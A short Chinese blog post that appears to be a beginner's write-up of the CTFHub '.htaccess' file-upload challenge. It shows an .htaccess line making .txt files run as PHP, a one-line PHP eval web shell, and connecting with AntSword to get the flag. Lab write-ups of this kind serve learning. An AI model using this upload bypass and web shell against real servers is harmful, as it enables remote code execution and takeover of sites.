CTFHub技能树之web文件上传“.htaccess”_buuctf文件上传 .hataccess

注：本人第一次写博客，主要是为了记录解题过程，如有不足之处，欢迎指出，但勿喷。

这几天开始做了些ctfhub技能树里面的题目，因为我们这学期开始学了一些web攻防的内容，然后就想着去ctfhub练练技能，话不多说，我们直接进入解题过程。

先看看题目

这里给了些提示内容，说htaccess文件是apache的一个配置文件之类的，有兴趣可以自行百度了解一下。在这题里面，htaccess文件的作用就是让别的文件以你指定的方式运行，如.txt文件可以以.php文件的形式运行。

了解了这些之后我们就会有一个思路：1、先上传一个.htaccess文件（注意：这里的文件名就是.htaccess，如果你改成1.htaccess或者其他的都会出现问题，具体原因我也不知道）。2、将我们写好的一句话木马改后缀名。3、蚁剑或菜刀连接。

一、上传.htaccess文件

.htaccess文件内容如下：

AddType application/x-httpd-php .txt

 这里会有一个问题：Windows系统必须输入文件名

我百度了一个方法：按win+r，输入cmd,切换到文件所在目录，rename重命名就可以了然后上传

 

 二、上传一句话木马

shell.txt文件内容（一句话木马挺多的，不止这种）

<?php @eval($_POST['hack']);?>

上传

 

 三、连接蚁剑或菜刀，我这里用的是蚁剑

四、得到flag（www目录下）